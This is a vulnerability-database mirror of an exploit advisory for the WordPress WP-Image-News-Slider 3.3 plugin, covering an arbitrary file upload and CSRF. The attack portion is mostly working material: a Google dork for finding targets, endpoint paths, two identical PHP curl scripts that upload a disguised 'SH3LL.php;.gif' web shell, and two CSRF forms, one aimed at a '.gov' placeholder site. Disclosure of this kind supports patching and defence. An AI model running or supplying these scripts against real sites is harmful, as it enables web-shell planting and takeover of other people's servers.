Vulners
Lucene search
WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload
🗓️ 05 Mar 2019 00:00:00Reported by KingSkrupellosType 
packetstorm🔗 packetstormsecurity.com👁 68 Views
`##################################################################################
# Exploit Title : WordPress WP-Image-News-Slider Plugins 3.3 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/03/2019
# Vendor Homepage : wpslideshow.com
# Software Information Link : wpslideshow.com/newsimage-slider/
# Software Affected Versions : 3.0 ~ 3.1 ~ 3.2 ~ 3.3 ~ 3.5
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-image-news-slider/"
# Vulnerability Type :
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
##################################################################################
# Description about Software :
***************************
Image News slider is a plugin that allow us to display slideshow on your website.
* Customizable gallery width and gallery height
* Image description
* Customizable Text display panel width
* Customizable auto play time
* Transition Time
* Customizable slide interval
* Customizable scalling
##################################################################################
# Impact :
**********
WordPress WP-Image-News-Slider Plugins 3.3 and other versions is prone to an arbitrary
file upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the
affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Weaknesses in this category are related to the management of permissions, privileges,
and other security features that are used to perform access control.
##################################################################################
Installation Video from Vendor =>
*******************************
youtube.com/watch?feature=player_embedded&v=DQ-rIX8Akug
== Installation ==
1. Install automatically through the `Plugins`, `Add New` menu in WordPress, or
upload the `wp-image-news-slider` folder to the `/wp-content/plugins/` directory.
2. Activate the plugin through the `Plugins` menu in WordPress. you can find
"Slider" link on left side navigation, click on to configure plugin Options.
##################################################################################
Direct Access Exploit 1 :
***********************
/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
Vulnerability Error :
******************
No upload found in $_FILES for Filedata - Security word error.
Note : We have to use CSRF or PHP Exploiter for successfull exploitation.
Exploit 2 :
*********
/wp-admin/admin.php?page=image-news-slider_manage
Vulnerability Error :
******************
WP_Error Object ( [errors] => Array ( [image_no_editor] =>
Array ( [0] => No editor could be selected. ) )
[error_data] => Array ( ) ) Error
# Directory File Path :
********************
/wp-content/uploads/image-news-slider/2_uploadfolder/big/.......
/wp-content/uploads/image-news-slider/30_uploadfolder/big/.....
/wp-content/uploads/image-news-slider/[ID-NUMBER]_uploadfolder/big/.......
/wp-content/plugins/wp-image-news-slider/js/swfupload/......
/wp-content/uploads/.....
##################################################################################
Exploit :
*******
# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 1 :
****************************************************************
<?php
$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
##################################################################################
# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 2 :
****************************************************************
<?php
$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://[VULNERABLEWEBSITE]/[PATH]/wp-content/plugins/wp-image-news-slider/js/swfupload/....
<?php
phpinfo();
?>
##################################################################################
Cross Site Request Forgery CSRF Exploiter 1 =>
******************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
##################################################################################
Cross Site Request Forgery CSRF Exploiter 2 =>
******************************************
<html>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-admin/admin.php?page=image-news-slider_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="slider_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
##################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2019 00:00Current
0.1Low risk
Vulners AI Score0.1